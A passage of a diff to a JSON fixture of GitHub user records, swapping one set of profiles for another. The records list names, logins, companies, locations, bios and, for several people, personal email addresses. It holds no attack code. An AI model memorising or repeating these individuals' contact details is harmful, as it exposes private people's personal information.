0, - "followers_count": 2, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 17, - "created_at": "2017-03-27T14:51:44Z", - "updated_at": "2024-09-06T12:59:34Z", - "node_id": "MDQ6VXNlcjI2NzE3Mzkz", + "public_repositories_count": 0, + "created_at": "2023-02-08T13:17:20Z", + "updated_at": "2023-02-08T13:17:20Z", + "node_id": "U_kgDOB3A05g", "bio": "", "is_hireable": false, "twitter_username": "" @@ -411803,124 +670277,124 @@ }, { "model": "github.user", - "pk": 2063, + "pk": 7375, "fields": { - "nest_created_at": "2024-09-12T00:34:44.155Z", - "nest_updated_at": "2024-09-12T00:34:44.155Z", - "name": "Robert Oschwald", - "login": "robertoschwald", + "nest_created_at": "2024-09-22T08:44:07.770Z", + "nest_updated_at": "2024-09-22T19:28:50.681Z", + "name": "Timothy Morgan", + "login": "tmorgan-fms", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1519879?v=4", - "company": "symentis GmbH", - "location": "Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/114254959?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 10, - "followers_count": 16, - "public_gists_count": 18, - "public_repositories_count": 50, - "created_at": "2012-03-09T12:07:53Z", - "updated_at": "2024-07-15T11:11:07Z", - "node_id": "MDQ6VXNlcjE1MTk4Nzk=", - "bio": "toxicum.", + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-09-23T18:11:37Z", + "updated_at": "2024-03-04T23:45:32Z", + "node_id": "U_kgDOBs9kbw", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2064, + "pk": 7376, "fields": { - "nest_created_at": "2024-09-12T00:34:46.645Z", - "nest_updated_at": "2024-09-12T00:34:46.645Z", - "name": "Gloria Alfstad", - "login": "alfstglo-fadv", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/46571235?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:44:08.091Z", + "nest_updated_at": "2024-09-22T19:28:50.993Z", + "name": "Tim te Beek", + "login": "timtebeek", + "email": "timtebeek@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1027334?v=4", + "company": "@moderneinc ", + "location": "Netherlands", "collaborators_count": 0, "following_count": 2, - "followers_count": 0, + "followers_count": 180, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-01-10T16:32:15Z", - "updated_at": "2024-09-10T19:04:07Z", - "node_id": "MDQ6VXNlcjQ2NTcxMjM1", - "bio": "", + "public_repositories_count": 118, + "created_at": "2011-09-05T12:20:13Z", + "updated_at": "2024-09-13T11:37:35Z", + "node_id": "MDQ6VXNlcjEwMjczMzQ=", + "bio": "Staff software engineer at Moderne, supporting the OpenRewrite community.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "timtebeek" } }, { "model": "github.user", - "pk": 2065, + "pk": 7377, "fields": { - "nest_created_at": "2024-09-12T00:34:48.293Z", - "nest_updated_at": "2024-09-12T00:34:48.293Z", - "name": "Alan Czajkowski", - "login": "alan-czajkowski", + "nest_created_at": "2024-09-22T08:44:08.784Z", + "nest_updated_at": "2024-09-22T19:28:51.626Z", + "name": "Tobias Gesellchen", + "login": "gesellix", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3029228?v=4", - "company": "https://openease.com/", - "location": "Toronto, Canada", + "avatar_url": "https://avatars.githubusercontent.com/u/432791?v=4", + "company": "", + "location": "Germany", "collaborators_count": 0, - "following_count": 5, - "followers_count": 5, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2012-12-12T22:55:28Z", - "updated_at": "2024-08-31T01:52:46Z", - "node_id": "MDQ6VXNlcjMwMjkyMjg=", - "bio": "https://www.linkedin.com/in/alanczajkowski/", - "is_hireable": true, - "twitter_username": "" + "following_count": 71, + "followers_count": 135, + "public_gists_count": 49, + "public_repositories_count": 323, + "created_at": "2010-10-08T19:12:03Z", + "updated_at": "2024-08-12T07:51:48Z", + "node_id": "MDQ6VXNlcjQzMjc5MQ==", + "bio": "Senior Hipster Developer", + "is_hireable": false, + "twitter_username": "gesellix" } }, { "model": "github.user", - "pk": 2066, + "pk": 7378, "fields": { - "nest_created_at": "2024-09-12T00:34:49.490Z", - "nest_updated_at": "2024-09-12T00:34:49.490Z", - "name": "Ganbayar Gansukh", - "login": "nomadme", + "nest_created_at": "2024-09-22T08:44:09.107Z", + "nest_updated_at": "2024-09-22T19:28:51.934Z", + "name": "Thomas Piccirello", + "login": "Piccirello", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6267271?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/8296030?v=4", "company": "", - "location": "Washington, D.C.", + "location": "San Francisco, California", "collaborators_count": 0, - "following_count": 8, - "followers_count": 8, - "public_gists_count": 8, - "public_repositories_count": 20, - "created_at": "2013-12-26T22:46:07Z", - "updated_at": "2024-08-06T15:54:29Z", - "node_id": "MDQ6VXNlcjYyNjcyNzE=", - "bio": "", + "following_count": 3, + "followers_count": 61, + "public_gists_count": 4, + "public_repositories_count": 39, + "created_at": "2014-07-29T04:42:41Z", + "updated_at": "2024-09-09T18:56:42Z", + "node_id": "MDQ6VXNlcjgyOTYwMzA=", + "bio": "TypeScript, Go, infrastructure, motherboards, security, and some privacy sprinkled in.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2067, + "pk": 7379, "fields": { - "nest_created_at": "2024-09-12T00:34:50.755Z", - "nest_updated_at": "2024-09-12T00:34:50.755Z", - "name": "", - "login": "vaparnab", + "nest_created_at": "2024-09-22T08:44:09.429Z", + "nest_updated_at": "2024-09-22T19:28:52.269Z", + "name": "Tomasz H", + "login": "tzch96", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/86321997?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/13201563?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 21, + "followers_count": 16, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2021-06-22T18:54:40Z", - "updated_at": "2022-03-03T14:17:06Z", - "node_id": "MDQ6VXNlcjg2MzIxOTk3", + "public_repositories_count": 7, + "created_at": "2015-07-06T13:40:30Z", + "updated_at": "2023-08-11T12:51:12Z", + "node_id": "MDQ6VXNlcjEzMjAxNTYz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -411928,24 +670402,49 @@ }, { "model": "github.user", - "pk": 2068, + "pk": 7380, "fields": { - "nest_created_at": "2024-09-12T00:34:51.945Z", - "nest_updated_at": "2024-09-12T00:35:00.441Z", - "name": "Tushar", - "login": "tadlakha9", + "nest_created_at": "2024-09-22T08:44:09.743Z", + "nest_updated_at": "2024-09-22T19:28:52.592Z", + "name": "Torsten Walter", + "login": "torstenwalter", + "email": "mail@torstenwalter.de", + "avatar_url": "https://avatars.githubusercontent.com/u/1743774?v=4", + "company": "@github", + "location": "Munich", + "collaborators_count": 0, + "following_count": 15, + "followers_count": 64, + "public_gists_count": 5, + "public_repositories_count": 89, + "created_at": "2012-05-15T21:56:31Z", + "updated_at": "2024-09-20T12:15:36Z", + "node_id": "MDQ6VXNlcjE3NDM3NzQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 7381, + "fields": { + "nest_created_at": "2024-09-22T08:44:10.055Z", + "nest_updated_at": "2024-09-22T19:28:52.926Z", + "name": "Viktor Thell", + "login": "viktor-thell-seal", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/51110539?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/56826456?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2019-05-28T06:47:13Z", - "updated_at": "2024-08-27T11:04:51Z", - "node_id": "MDQ6VXNlcjUxMTEwNTM5", + "public_repositories_count": 5, + "created_at": "2019-10-21T11:00:06Z", + "updated_at": "2024-08-27T18:02:22Z", + "node_id": "MDQ6VXNlcjU2ODI2NDU2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -411953,24 +670452,24 @@ }, { "model": "github.user", - "pk": 2069, + "pk": 7382, "fields": { - "nest_created_at": "2024-09-12T00:34:53.174Z", - "nest_updated_at": "2024-09-12T00:34:53.174Z", - "name": "", - "login": "Aseem-DevOps", + "nest_created_at": "2024-09-22T08:44:10.740Z", + "nest_updated_at": "2024-09-22T19:28:53.547Z", + "name": "William Enright", + "login": "wpenright", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/126510452?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6394377?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-02-27T18:25:59Z", - "updated_at": "2024-05-02T07:11:28Z", - "node_id": "U_kgDOB4pldA", + "public_repositories_count": 6, + "created_at": "2014-01-13T23:11:38Z", + "updated_at": "2023-09-20T02:14:53Z", + "node_id": "MDQ6VXNlcjYzOTQzNzc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -411978,49 +670477,49 @@ }, { "model": "github.user", - "pk": 2070, + "pk": 7383, "fields": { - "nest_created_at": "2024-09-12T00:34:54.789Z", - "nest_updated_at": "2024-09-12T00:34:54.789Z", - "name": "Francisco Wilson Rodrigues Júnior", - "login": "wilsoonjunior14", - "email": "wjunior_msn@hotmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/19149664?v=4", - "company": "", - "location": "Recife Pernambuco", + "nest_created_at": "2024-09-22T08:44:11.061Z", + "nest_updated_at": "2024-09-22T19:28:53.855Z", + "name": "Wolfgang Mayer", + "login": "woolph", + "email": "wolfgang.mayer@engel.at", + "avatar_url": "https://avatars.githubusercontent.com/u/1819043?v=4", + "company": "ENGEL Austria GmbH", + "location": "", "collaborators_count": 0, - "following_count": 4, - "followers_count": 6, + "following_count": 2, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 45, - "created_at": "2016-05-02T12:25:37Z", - "updated_at": "2024-08-06T23:18:48Z", - "node_id": "MDQ6VXNlcjE5MTQ5NjY0", - "bio": "Engenheiro de Computação", + "public_repositories_count": 8, + "created_at": "2012-06-05T11:55:50Z", + "updated_at": "2024-08-05T20:41:05Z", + "node_id": "MDQ6VXNlcjE4MTkwNDM=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2071, + "pk": 7384, "fields": { - "nest_created_at": "2024-09-12T00:34:55.576Z", - "nest_updated_at": "2024-09-12T00:34:55.576Z", - "name": "", - "login": "Amrin-Taj", + "nest_created_at": "2024-09-22T08:44:11.381Z", + "nest_updated_at": "2024-09-22T19:28:54.186Z", + "name": "Xavier", + "login": "xaviou", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/75828491?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1102034?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2020-12-11T06:49:28Z", - "updated_at": "2024-06-12T07:15:04Z", - "node_id": "MDQ6VXNlcjc1ODI4NDkx", + "public_repositories_count": 76, + "created_at": "2011-10-04T14:31:01Z", + "updated_at": "2024-05-24T13:31:13Z", + "node_id": "MDQ6VXNlcjExMDIwMzQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -412028,49 +670527,49 @@ }, { "model": "github.user", - "pk": 2072, + "pk": 7385, "fields": { - "nest_created_at": "2024-09-12T00:34:56.757Z", - "nest_updated_at": "2024-09-12T00:34:56.757Z", - "name": "Kevin Fries", - "login": "kelfink", + "nest_created_at": "2024-09-22T08:44:11.691Z", + "nest_updated_at": "2024-09-22T19:28:54.495Z", + "name": "", + "login": "alinradut", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3877861?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/380846?v=4", "company": "", - "location": "Sacramento CA", + "location": "Targu Mures, Romania", "collaborators_count": 0, - "following_count": 4, - "followers_count": 6, - "public_gists_count": 10, - "public_repositories_count": 64, - "created_at": "2013-03-15T19:14:25Z", - "updated_at": "2024-08-09T22:07:32Z", - "node_id": "MDQ6VXNlcjM4Nzc4NjE=", - "bio": "Code4Sacramento @code4sac Brigade of Code For America.\r\nFront-end (React, WebCompoonents, Vue)\r\nBack-end ( Rails, Node.js, Java Servlets, RDBMS ", - "is_hireable": false, - "twitter_username": "xelfink" + "following_count": 6, + "followers_count": 94, + "public_gists_count": 16, + "public_repositories_count": 91, + "created_at": "2010-08-30T15:29:28Z", + "updated_at": "2024-06-26T18:01:08Z", + "node_id": "MDQ6VXNlcjM4MDg0Ng==", + "bio": "", + "is_hireable": true, + "twitter_username": "" } }, { "model": "github.user", - "pk": 2073, + "pk": 7386, "fields": { - "nest_created_at": "2024-09-12T00:34:59.229Z", - "nest_updated_at": "2024-09-12T00:34:59.229Z", - "name": "Jo Wannenburg", - "login": "johannes-wannenburg-sal", + "nest_created_at": "2024-09-22T08:44:12.012Z", + "nest_updated_at": "2024-09-22T19:28:54.818Z", + "name": "", + "login": "cs-chris-moore", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/82342805?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/41636642?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-04-11T21:33:40Z", - "updated_at": "2024-08-03T21:53:40Z", - "node_id": "MDQ6VXNlcjgyMzQyODA1", + "public_repositories_count": 2, + "created_at": "2018-07-24T14:08:07Z", + "updated_at": "2022-07-01T20:07:16Z", + "node_id": "MDQ6VXNlcjQxNjM2NjQy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -412078,49 +670577,49 @@ }, { "model": "github.user", - "pk": 2074, + "pk": 7387, "fields": { - "nest_created_at": "2024-09-12T00:35:01.716Z", - "nest_updated_at": "2024-09-12T00:35:01.716Z", - "name": "Stav Hayoun Noiberg", - "login": "StavHayounNoiberg", + "nest_created_at": "2024-09-22T08:44:12.365Z", + "nest_updated_at": "2024-09-22T19:28:55.129Z", + "name": "Dejan Stojadinović", + "login": "dejan2609", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/97242124?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/19467899?v=4", "company": "", - "location": "Tel Aviv, Israel", + "location": "Belgrade, Serbia", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2022-01-06T15:36:12Z", - "updated_at": "2024-08-18T12:29:36Z", - "node_id": "U_kgDOBcvMDA", - "bio": "", + "following_count": 119, + "followers_count": 34, + "public_gists_count": 17, + "public_repositories_count": 272, + "created_at": "2016-05-19T10:32:31Z", + "updated_at": "2024-09-22T16:41:02Z", + "node_id": "MDQ6VXNlcjE5NDY3ODk5", + "bio": "DevOps Engineer @ Bosch SoftTec GmbH", "is_hireable": false, - "twitter_username": "" + "twitter_username": "dejan2609" } }, { "model": "github.user", - "pk": 2075, + "pk": 7388, "fields": { - "nest_created_at": "2024-09-12T00:35:03.931Z", - "nest_updated_at": "2024-09-12T00:35:03.931Z", - "name": "Veeresh Santhebennur", - "login": "VeereshSSanthebennur", - "email": "codingvee@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/93672991?v=4", - "company": "Aptean", - "location": "Bangalore", + "nest_created_at": "2024-09-22T08:44:12.680Z", + "nest_updated_at": "2024-09-22T19:28:55.463Z", + "name": "Erik Wramner", + "login": "erik-wramner", + "email": "erik@wramner.name", + "avatar_url": "https://avatars.githubusercontent.com/u/8382730?v=4", + "company": "CodeMint", + "location": "Sweden", "collaborators_count": 0, - "following_count": 36, - "followers_count": 5, + "following_count": 0, + "followers_count": 13, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2021-11-03T17:07:44Z", - "updated_at": "2024-05-06T04:33:44Z", - "node_id": "U_kgDOBZVWHw", + "public_repositories_count": 24, + "created_at": "2014-08-07T08:16:03Z", + "updated_at": "2024-02-08T11:12:30Z", + "node_id": "MDQ6VXNlcjgzODI3MzA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -412128,49 +670627,49 @@ }, { "model": "github.user", - "pk": 2076, + "pk": 7389, "fields": { - "nest_created_at": "2024-09-12T00:35:05.540Z", - "nest_updated_at": "2024-09-12T00:35:05.540Z", - "name": "", - "login": "tasso94", + "nest_created_at": "2024-09-22T08:44:12.989Z", + "nest_updated_at": "2024-09-22T19:28:55.801Z", + "name": "george thomas", + "login": "smoothreggae", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3015690?v=4", - "company": "@camunda ", - "location": "Berlin", + "avatar_url": "https://avatars.githubusercontent.com/u/424562?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 13, - "followers_count": 24, + "following_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 17, - "created_at": "2012-12-11T10:49:32Z", - "updated_at": "2024-08-06T07:09:26Z", - "node_id": "MDQ6VXNlcjMwMTU2OTA=", - "bio": "Senior Full Stack Engineer & Tech Lead @camunda Automation Platform 7", + "public_repositories_count": 20, + "created_at": "2010-10-02T15:46:11Z", + "updated_at": "2021-12-19T02:50:38Z", + "node_id": "MDQ6VXNlcjQyNDU2Mg==", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2077, + "pk": 7390, "fields": { - "nest_created_at": "2024-09-12T00:35:06.757Z", - "nest_updated_at": "2024-09-12T00:35:06.757Z", - "name": "Stevie G", - "login": "stevieg27", + "nest_created_at": "2024-09-22T08:44:13.646Z", + "nest_updated_at": "2024-09-22T19:28:56.428Z", + "name": "", + "login": "danielhodder", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/48964137?v=4", - "company": "test", + "avatar_url": "https://avatars.githubusercontent.com/u/1029558?v=4", + "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, - "public_gists_count": 1, - "public_repositories_count": 102, - "created_at": "2019-03-26T18:53:48Z", - "updated_at": "2024-08-28T12:17:50Z", - "node_id": "MDQ6VXNlcjQ4OTY0MTM3", + "followers_count": 2, + "public_gists_count": 7, + "public_repositories_count": 32, + "created_at": "2011-09-06T09:37:55Z", + "updated_at": "2024-09-19T01:07:08Z", + "node_id": "MDQ6VXNlcjEwMjk1NTg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -412178,24 +670677,24 @@ }, { "model": "github.user", - "pk": 2078, + "pk": 7391, "fields": { - "nest_created_at": "2024-09-12T00:35:07.944Z", - "nest_updated_at": "2024-09-12T00:35:07.944Z", - "name": "", - "login": "SwapnaAnchuri", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/169351979?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:44:13.960Z", + "nest_updated_at": "2024-09-22T19:28:56.737Z", + "name": "Dave Goddard", + "login": "dgodd", + "email": "dave@goddard.au", + "avatar_url": "https://avatars.githubusercontent.com/u/126285?v=4", + "company": "Marketplacer", + "location": "Melbourne, Australia", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-05-09T09:40:12Z", - "updated_at": "2024-05-09T09:40:25Z", - "node_id": "U_kgDOChgbKw", + "following_count": 1, + "followers_count": 20, + "public_gists_count": 2, + "public_repositories_count": 177, + "created_at": "2009-09-13T03:09:52Z", + "updated_at": "2024-09-09T01:18:43Z", + "node_id": "MDQ6VXNlcjEyNjI4NQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -412203,49 +670702,74 @@ }, { "model": "github.user", - "pk": 2079, + "pk": 7392, "fields": { - "nest_created_at": "2024-09-12T00:35:11.158Z", - "nest_updated_at": "2024-09-12T00:35:11.158Z", - "name": "Nico Arianto", - "login": "nico-arianto", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6427889?v=4", - "company": "minden.ai", - "location": "Singapore", + "nest_created_at": "2024-09-22T08:44:14.285Z", + "nest_updated_at": "2024-09-22T19:28:57.061Z", + "name": "David Dellsperger", + "login": "ddellspe", + "email": "david.dellsperger@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2405631?v=4", + "company": "SnapLogic", + "location": "Kansas City, MO", "collaborators_count": 0, - "following_count": 70, + "following_count": 1, "followers_count": 7, + "public_gists_count": 4, + "public_repositories_count": 20, + "created_at": "2012-09-23T17:15:37Z", + "updated_at": "2024-08-10T00:41:17Z", + "node_id": "MDQ6VXNlcjI0MDU2MzE=", + "bio": "", + "is_hireable": false, + "twitter_username": "DJDellsperger" + } +}, +{ + "model": "github.user", + "pk": 7393, + "fields": { + "nest_created_at": "2024-09-22T08:44:14.599Z", + "nest_updated_at": "2024-09-22T19:28:57.379Z", + "name": "David Jahn", + "login": "davidjahn", + "email": "david.a.jahn@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6377468?v=4", + "company": "", + "location": "New York, NY", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 6, "public_gists_count": 0, - "public_repositories_count": 12, - "created_at": "2014-01-17T08:54:50Z", - "updated_at": "2024-07-27T07:46:14Z", - "node_id": "MDQ6VXNlcjY0Mjc4ODk=", - "bio": "Data, Software Engineer, and Software Developer that passionate about the latest software technology and methodology to boost human life", - "is_hireable": true, + "public_repositories_count": 19, + "created_at": "2014-01-11T16:52:40Z", + "updated_at": "2024-08-05T15:58:31Z", + "node_id": "MDQ6VXNlcjYzNzc0Njg=", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2080, + "pk": 7394, "fields": { - "nest_created_at": "2024-09-12T00:35:12.379Z", - "nest_updated_at": "2024-09-12T00:35:12.379Z", + "nest_created_at": "2024-09-22T08:44:14.929Z", + "nest_updated_at": "2024-09-22T19:28:57.696Z", "name": "", - "login": "PrashanthPragadeeswaran", + "login": "settesoft", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/148347574?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1410276?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-10-18T12:31:04Z", - "updated_at": "2024-06-20T09:02:36Z", - "node_id": "U_kgDOCNeatg", + "public_gists_count": 1, + "public_repositories_count": 2, + "created_at": "2012-02-05T16:36:16Z", + "updated_at": "2024-08-05T11:07:00Z", + "node_id": "MDQ6VXNlcjE0MTAyNzY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -412253,24 +670777,24 @@ }, { "model": "github.user", - "pk": 2081, + "pk": 7395, "fields": { - "nest_created_at": "2024-09-12T00:35:14.085Z", - "nest_updated_at": "2024-09-12T00:35:14.085Z", - "name": "Nikolaj Aggeboe", - "login": "aggeboe", - "email": "nag@nine.dk", - "avatar_url": "https://avatars.githubusercontent.com/u/17447966?v=4", + "nest_created_at": "2024-09-22T08:44:15.636Z", + "nest_updated_at": "2024-09-22T19:28:58.389Z", + "name": "Desmond Koh", + "login": "deskoh", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9096984?v=4", "company": "", - "location": "", + "location": "Singapore", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2016-02-24T08:12:33Z", - "updated_at": "2024-09-05T09:53:14Z", - "node_id": "MDQ6VXNlcjE3NDQ3OTY2", + "following_count": 8, + "followers_count": 12, + "public_gists_count": 33, + "public_repositories_count": 77, + "created_at": "2014-10-09T00:10:22Z", + "updated_at": "2024-09-15T10:35:19Z", + "node_id": "MDQ6VXNlcjkwOTY5ODQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -412278,49 +670802,74 @@ }, { "model": "github.user", - "pk": 2082, + "pk": 7396, "fields": { - "nest_created_at": "2024-09-12T00:35:15.762Z", - "nest_updated_at": "2024-09-12T00:35:15.763Z", - "name": "Daniel Hay", - "login": "Danielhay016", + "nest_created_at": "2024-09-22T08:44:15.951Z", + "nest_updated_at": "2024-09-22T19:28:58.702Z", + "name": "Diego Marcilio", + "login": "dvmarcilio", + "email": "dvmarcilio@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3458727?v=4", + "company": "Uber", + "location": "Amsterdam, The Netherlands", + "collaborators_count": 0, + "following_count": 46, + "followers_count": 32, + "public_gists_count": 1, + "public_repositories_count": 13, + "created_at": "2013-02-02T19:15:31Z", + "updated_at": "2024-08-02T23:20:47Z", + "node_id": "MDQ6VXNlcjM0NTg3Mjc=", + "bio": "", + "is_hireable": true, + "twitter_username": "dvmarcilio" + } +}, +{ + "model": "github.user", + "pk": 7397, + "fields": { + "nest_created_at": "2024-09-22T08:44:16.591Z", + "nest_updated_at": "2024-09-22T19:28:59.323Z", + "name": "Dmitriy Dubson", + "login": "ddubson", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/103133855?v=4", - "company": "Cybereason", - "location": "Israel ", + "avatar_url": "https://avatars.githubusercontent.com/u/437269?v=4", + "company": "Luminate", + "location": "New York, NY", "collaborators_count": 0, - "following_count": 3, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2022-04-06T16:02:16Z", - "updated_at": "2024-08-29T21:16:16Z", - "node_id": "U_kgDOBiWynw", - "bio": "Hi , I'm Daniel Hay \r\n🌱 I’m currently learning C, C++, Html, CSS, JavaScript, Java, Node, Express, Python\r\n\r\nContact info :\r\nlinkedin - Daniel Hay", + "following_count": 55, + "followers_count": 45, + "public_gists_count": 12, + "public_repositories_count": 137, + "created_at": "2010-10-12T22:40:47Z", + "updated_at": "2024-06-05T20:52:06Z", + "node_id": "MDQ6VXNlcjQzNzI2OQ==", + "bio": "Builds intangible stuff. Originally from Kharkiv, UA 🇺🇦 Слава Україні ✊🏼 ", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2083, + "pk": 7398, "fields": { - "nest_created_at": "2024-09-12T00:35:16.968Z", - "nest_updated_at": "2024-09-12T00:35:16.968Z", - "name": "Amy Chih", - "login": "AmyChihHi", + "nest_created_at": "2024-09-22T08:44:16.935Z", + "nest_updated_at": "2024-09-22T19:28:59.635Z", + "name": "Dmitriy Skopintsev", + "login": "bigstinky86", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/171004696?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/41194602?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-05-28T05:44:30Z", - "updated_at": "2024-08-27T02:09:55Z", - "node_id": "U_kgDOCjFTGA", + "public_repositories_count": 9, + "created_at": "2018-07-13T12:35:09Z", + "updated_at": "2024-09-06T11:48:31Z", + "node_id": "MDQ6VXNlcjQxMTk0NjAy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -412328,124 +670877,124 @@ }, { "model": "github.user", - "pk": 2084, + "pk": 7399, "fields": { - "nest_created_at": "2024-09-12T00:35:18.168Z", - "nest_updated_at": "2024-09-12T00:35:18.168Z", - "name": "", - "login": "xiezhx9", - "email": "xiezhx9@mail3.sysu.edu.cn", - "avatar_url": "https://avatars.githubusercontent.com/u/169378332?v=4", + "nest_created_at": "2024-09-22T08:44:17.255Z", + "nest_updated_at": "2024-09-22T19:28:59.958Z", + "name": "Dmitriy Stoyanov", + "login": "DmitriyStoyanov", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1244213?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2024-05-09T15:19:17Z", - "updated_at": "2024-09-01T11:53:36Z", - "node_id": "U_kgDOChiCHA", - "bio": "try to be bk driver", + "following_count": 1, + "followers_count": 33, + "public_gists_count": 1, + "public_repositories_count": 40, + "created_at": "2011-12-06T10:53:26Z", + "updated_at": "2024-09-04T11:20:36Z", + "node_id": "MDQ6VXNlcjEyNDQyMTM=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2085, + "pk": 7400, "fields": { - "nest_created_at": "2024-09-12T00:35:19.412Z", - "nest_updated_at": "2024-09-12T00:35:19.412Z", - "name": "HackermanDan", - "login": "hackerman-Dan", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/106969204?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:44:17.565Z", + "nest_updated_at": "2024-09-22T19:29:00.265Z", + "name": "Drew Miller", + "login": "itsdrewmiller", + "email": "drew@drewmiller.net", + "avatar_url": "https://avatars.githubusercontent.com/u/755598?v=4", + "company": "NGP VAN", + "location": "United States", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 12, + "followers_count": 23, "public_gists_count": 1, - "public_repositories_count": 2, - "created_at": "2022-06-06T11:50:42Z", - "updated_at": "2022-06-25T10:48:02Z", - "node_id": "U_kgDOBmA4dA", - "bio": "", + "public_repositories_count": 33, + "created_at": "2011-04-27T21:13:29Z", + "updated_at": "2024-09-06T19:02:52Z", + "node_id": "MDQ6VXNlcjc1NTU5OA==", + "bio": "I am the SVP of Engineering at @NGPVAN. Is it weird to write \"at @\"? It seems weird but the other way is weirder.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2086, + "pk": 7401, "fields": { - "nest_created_at": "2024-09-12T00:35:20.711Z", - "nest_updated_at": "2024-09-12T00:35:23.277Z", - "name": "Tomas 